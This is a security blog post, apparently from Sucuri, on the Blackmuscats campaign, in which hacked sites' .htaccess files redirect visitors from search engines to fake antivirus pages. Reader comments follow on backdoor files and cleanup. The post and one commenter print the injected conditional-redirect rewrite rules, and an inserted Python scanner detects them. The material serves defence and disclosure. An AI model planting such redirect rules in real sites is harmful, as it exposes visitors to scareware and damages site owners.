Blackmuscats Conditional Redirections to Fake AntiVirus

We are seeing many sites today compromised with the Blackmuscats conditional redirection. This malware causes anyone visiting the hacked site to be redirected to a Fake AV (AntiVirus) page. Why Blackmuscats? All the compromised sites have .htaccess redirections pointing to files ending in “blackmuscats?5”.

So far we have detected more than 8,000 sites with this type of redirection and the number is growing (last night we had only found a few hundred).

Note: this is a conditional redirection, so you are only sent to the malware site if you are coming from a search engine, not if you visit the site directly.

Here are some of the domains being used as part of this malware campaign:

1297 redirections
1156 redirections
1077 redirections
1001 redirections
975 redirections
391 redirections
329 redirections
263 redirections
244 redirections
223 redirections
206 redirections
192 redirections
80 redirections
65 redirections
.. many more..

This is what the .htaccess looks like on the hacked sites:

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|..suchmaschine|web-archiv|infospace).(.*)
RewriteRule ^(.*)$ [R=301,L]

What happens next?

So what happens next? If someone visits a compromised site by clicking on a search engine results page, they will be sent to one of those domains we listed above, and then to (and similar AV related domains): ( -> redirection to -> (

This is where you get those scary warnings like “Your computer is compromised”.
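As an added example (not from the post or from Sucuri's own tooling), here is a small Python scanner that flags the pattern described above in a .htaccess file: a RewriteCond on HTTP_REFERER matching search-engine names, followed by a RewriteRule that redirects (R=) to a host other than the site's own. The sample .htaccess and the target domain in it are constructed placeholders, and the site hostname is passed in by the caller.

```python
import re
from typing import Dict, List

# Constructed sample .htaccess, modelled on the pattern described in the post;
# the redirect target is a placeholder, not one of the real campaign domains.
SAMPLE_HTACCESS = """\
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
# END WordPress
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|bing|suchmaschine|web-archiv|infospace).(.*)
RewriteRule ^(.*)$ http://redirector.example.invalid/blackmuscats?5 [R=301,L]
"""

# Referer substrings that mark a rule as targeting search-engine visitors
# (plain substring match, so keep this list short to limit false positives).
SEARCH_ENGINES = ("google", "yahoo", "bing", "ask", "msn", "aol", "suchmaschine", "infospace")


def find_conditional_redirects(htaccess: str, site_host: str) -> List[Dict[str, str]]:
    """Return RewriteRules that fire only on a search-engine Referer and send
    visitors to an external host. Each finding records the line number, the
    conditions, the rule and the target host so an operator can review it."""
    findings = []
    pending_conds = []  # RewriteCond lines apply to the next RewriteRule only
    for lineno, raw in enumerate(htaccess.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("RewriteCond"):
            pending_conds.append(line)
            continue
        if line.startswith("RewriteRule"):
            parts = line.split()  # RewriteRule <pattern> <substitution> [flags]
            target = parts[2] if len(parts) >= 3 else ""
            m = re.match(r"https?://([^/]+)", target)
            referer_conds = [c for c in pending_conds if "%{HTTP_REFERER}" in c]
            engine_hit = any(e in c.lower() for c in referer_conds for e in SEARCH_ENGINES)
            external = m is not None and m.group(1).lower() != site_host.lower()
            if referer_conds and engine_hit and external and "R=" in line:
                findings.append({"line": str(lineno), "conditions": "; ".join(referer_conds),
                                 "rule": line, "target_host": m.group(1)})
            pending_conds = []  # conditions never carry past a rule
    return findings
```

Run it over every .htaccess on the host (including ones in subdirectories) rather than only the document root, since the post notes the rules are re-added by a separate backdoor file.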

We will post more details as we keep monitoring it.

About Daniel Cid

Daniel B. Cid is the Founder & CTO of Sucuri and also the founder of the open source project OSSEC HIDS. His interests range from intrusion detection and log analysis (log-based intrusion detection) to web-based malware research and secure development. You can find more about Daniel on his site or on Twitter: @danielcid

  • Vaness Roche

     I was the victim of this attack; my site is no longer accessible. What should I do, please?

    • David Dede

      You have to clear the .htaccess file that the attackers added. Sucuri also offers clean up packages:

  • Travis

    Searching desperately for steps I can take to remove this from my websites.

  • Ricki

    My websites were infected, it started a few days ago. It seems like after I clean it up, it reappears. I must not be getting the root, it’s like some kind of flash virus.

    • Travis

      Same here, cleaning .htaccess solved the problem temporarily. If you find the root, could you please kindly post it here?

      • Ricki

         Of course

  • Raitchev_alex

    Same for me… five sites under attack. I did not find the issue… editing htaccess fixed it temporarily. Google reports it as a spam site..

  • Raitchev_alex

    Temporary: disable friendly URLs and delete the htaccess file…

  • Ig_design

    I use Joomla and have this on my site, but can’t find anything wrong in the .htaccess file. Something interesting is that it redirects me to not to any other sites. Can anyone tell me how to fix this?

    • Coby_cats

       I have the same problem on two sites that I worked on yesterday. I now wish I hadn’t…

  • Raitchev_alex

    I deleted the .htaccess files but they appeared again… any time after a couple of times

  • Raitchev_alex

    Has somebody fixed this problem?

    • Ig_design

       I tried to delete the .htaccess files and now it redirects me even when I type the URL directly, not only from Google etc. The interesting thing for my site is that it redirects me to not any other site

  • Fabio Cuzzi

    Any news about how to get rid of this?

  • Montana

    I was hacked a couple of days ago.

    I found that there was a security issue with a component “com_jce” and I removed it and installed a newer version.

    I also found a couple of files in:

    I removed them and now everything seems to work again. I hope!

    No more hacked .htaccess file.

    • Travis

      Thank you so much for posting this.  I found the story.php and a similar .cache_xxx.php file (the string of letters was different for me).  So far it seems deleting these files does stop the htaccess re-writes.  Thank you again for sharing what you found.

      • Montana

         Ok, nice. But you have to check if you have any component that is outdated. There may be a security hole there for the hackers to get in. They got in the first time, now you have to prevent a second time.

        • Travis

          Like you, there was an outdated JCE component on the site with the malicious .php files.  In the process of updating everything right now, all passwords have already been changed.  The hardest part was finding the malicious code, and your post helped greatly with that.  Thanks again.

          • Montana

            Glad I could help you!

  • Pingback: Redirection Malware Very Good Leads to Fake AV | Sucuri()

  • Dean

    Thank you! A search for “.cache” revealed the source of my .htaccess issues. Never was a fan of Joomla, but now will turn people away who want it.

  • BigD

    Thanks, saved me a lot of trouble finding the infection.

    For info this is what I found in my htaccess file – in white so it was hidden! Hope it helps.

    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace).(.*)

    RewriteRule ^(.*)$ [R=301,L]

    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline).(.*)

    RewriteRule ^(.*)$ [R=301,L]

  • Gee

    I found code in the .htaccess file and deleted it, but it still appears again 1-2 hours later. I could not find “.cache_pchuyx.php” or the story.php file. I also uninstalled the “com_jce” component, still redirects…. please help me… this has infected my 6-7 websites… Thanks

  • sadouliev15 .

    To fix the redirection problems due to malware there is a solution.
